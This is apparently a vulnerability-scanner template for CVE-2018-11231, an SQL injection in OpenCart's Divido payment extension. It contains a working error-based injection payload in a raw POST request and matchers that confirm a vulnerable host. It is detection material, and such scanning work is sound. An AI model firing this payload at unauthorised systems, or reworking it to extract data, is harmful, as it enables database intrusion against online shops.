32 lines
662 B
YAML
32 lines
662 B
YAML
|
id: CVE-2018-11231
|
||
|
|
||
|
info:
|
||
|
name: Opencart Sqli
|
||
|
author: ritikchaddha
|
||
|
severity: high
|
||
|
reference:
|
||
|
- http://foreversong.cn/archives/1183
|
||
|
tags: opencart,sqli,cve,cve2018
|
||
|
|
||
|
requests:
|
||
|
- raw:
|
||
|
- |
|
||
|
POST /upload/index.php?route=extension/payment/divido/update HTTP/1.1
|
||
|
Host: {{Hostname}}
|
||
|
|
||
|
{"metadata":{"order_id":"1 and updatexml(1,concat(0x7e,(SELECT md5(202072102)),0x7e),1)"},"status":2}
|
||
|
|
||
|
redirects: true
|
||
|
max-redirects: 2
|
||
|
matchers-condition: and
|
||
|
matchers:
|
||
|
|
||
|
- type: word
|
||
|
words:
|
||
|
- "6f7c6dcbc380aac3bcba1f9fccec991e"
|
||
|
part: body
|
||
|
|
||
|
- type: status
|
||
|
status:
|
||
|
- 200
|